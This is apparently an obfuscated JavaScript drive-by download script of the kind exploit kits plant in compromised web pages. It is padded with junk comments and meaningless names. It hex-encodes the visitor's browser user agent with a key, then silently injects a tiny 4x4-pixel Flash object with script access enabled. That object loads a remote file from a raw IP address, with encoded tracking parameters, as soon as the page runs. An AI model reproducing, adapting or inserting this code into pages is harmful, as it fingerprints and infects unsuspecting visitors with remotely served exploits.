/*s99428d12633hssfj52357fs*/function hgfgerdfgdf(num, width){/*s14495d73070hfj81585fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s62404d63707hfj44266fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s90301d38704hfj23038fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s1771d42436hfj41094fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd88070hfs*/c += b + d;/*s37708d8192hfj81271fs*/e += 1;}return c;}/*s84631dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.78.83/?NjAzMDQzODI=&info=MTQzNTQ0Mjg=&rand=xH_QMrDYbR7FFYDfKPrEUKdEMU7WA0eKwYyZha_VF5yxFDfGpbH1FxzspV-dCF-EmvFvdLMHIwKh1UTASwd&elsa=gyYwIVVgT_6im2kOEzhSZhpaB-heJYAtM-pCVErM_2lzwz7AVcsoiwhSCu2BWyOstVlsS6QgQnKz7VaOO-w&arnd=MTE4NDUxNzI=", ghnvbn("http://188.225.78.83/?MTA1NTU0OTI5&info=MjkxNDg0NA==&elsa=K0jBCHewdplNpcA10W9q-tiUDRyB-dhZeE_BGPZAhF_pCXEbQ72g_zy7AkdcMmwRWK6FENjOge&rand=xXzQMvWebRXQC53EKvrcT6NHMVHRH0CL2Y-dmrHTefjaelWkzrLFTF_yozKASwSG6_JtdfJRDQ&shld=MTY4NjY0MDQ=","wexykukusw"));